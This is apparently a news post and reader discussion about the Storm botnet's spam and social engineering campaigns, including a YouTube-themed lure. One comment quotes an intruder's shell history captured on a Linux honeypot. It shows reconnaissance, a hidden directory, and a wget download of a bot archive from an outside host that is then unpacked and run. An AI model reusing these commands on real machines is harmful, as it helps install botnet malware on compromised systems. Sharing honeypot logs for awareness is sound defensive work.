Storm Botnet Is Behind Two New Attacks

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

I had a 500% increase in Spam on Tuesday Last Week

[Jennifer+York]

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

I fscking hate SPAM!

It's not just windows they're exploiting...

[nick13245]

For instance, here's a recent attack to my honeypot (Running Slackware Linux)

root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
root@zomg:~# cat /home/webmaster/.bash_history
ssh localhost
w
cat /etc/hosts
cat /proc/cpuinfo
passwd
cd /var/tmp
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd .bot/
PATH=.:$PATH
bash

These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.